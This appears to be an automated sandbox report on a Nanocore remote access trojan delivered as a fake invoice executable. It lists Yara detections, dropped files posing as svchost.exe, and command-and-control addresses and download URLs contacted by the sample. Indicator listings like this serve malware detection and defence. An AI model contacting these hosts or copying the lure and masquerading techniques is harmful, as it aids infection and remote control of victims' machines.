Source:	Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb2F source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb00 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: 185.157.160.233
Source: Malware configuration extractor	URLs: annapro.linkpc.net

Source: global traffic	TCP traffic: 192.168.2.4:49754 -> 185.157.160.233:2212
Source: global traffic	TCP traffic: 192.168.2.4:49778 -> 105.112.108.188:2212

Source: global traffic	HTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com

Source: Joe Sandbox View	IP Address: 185.157.160.233 185.157.160.233
Source: Joe Sandbox View	IP Address: 104.21.71.230 104.21.71.230

Source: Joe Sandbox View	ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233
Source: unknown	TCP traffic detected without corresponding DNS query: 185.157.160.233

Source: global traffic	HTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1Host: coroloboxorozor.com

Source: unknown

DNS traffic detected: queries for: coroloboxorozor.com

Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/A665A0731C4748264DB5C2625CAB61D4.html
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/EFDD2E5486C74022C50C219C9576AB0D.html
Source: powershell.exe, 00000005.00000003.689761499.00000000027E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.808326949.0000000008D9E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micros
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.947749915.00000000049AE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.903984794.0000000003251000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.946142448.0000000004871000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.941033041.0000000002EA1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.940976740.00000000036E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.947749915.00000000049AE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000008.00000000.689085793.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000005.00000003.773747719.0000000007386000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000003.689873810.000000000734E000.00000004.00000001.sdmp	String found in binary or memory: https://go.mic
Source: powershell.exe, 00000005.00000003.782717627.0000000004C23000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0C
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.899381605.000000000158B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.CasPol.exe.314dd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.CasPol.exe.5460000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: CN-Invoice-XXXXX9808-19011143287989.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BCEA70	12_2_02BCEA70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BCAA50	12_2_02BCAA50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BC0040	12_2_02BC0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BCCDE0	12_2_02BCCDE0
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Code function: 17_2_013EB018	17_2_013EB018
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Code function: 17_2_013EB008	17_2_013EB008
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Code function: 22_2_01BFB018	22_2_01BFB018
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Code function: 22_2_01BFB008	22_2_01BFB008
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Code function: 22_2_01BF1258	22_2_01BF1258

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: String function: 0040B550 appears 50 times

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: invalid certificate

Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWQAD ClQ.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.966965029.0000000005E90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000003.681094036.0000000006134000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSKPwSvas.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp	Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X<>"°&<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.966591504.0000000005AC0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.966591504.0000000005AC0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.965623964.0000000005690000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.899381605.000000000158B000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CN-Invoice-XXXXX9808-19011143287989.exe

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
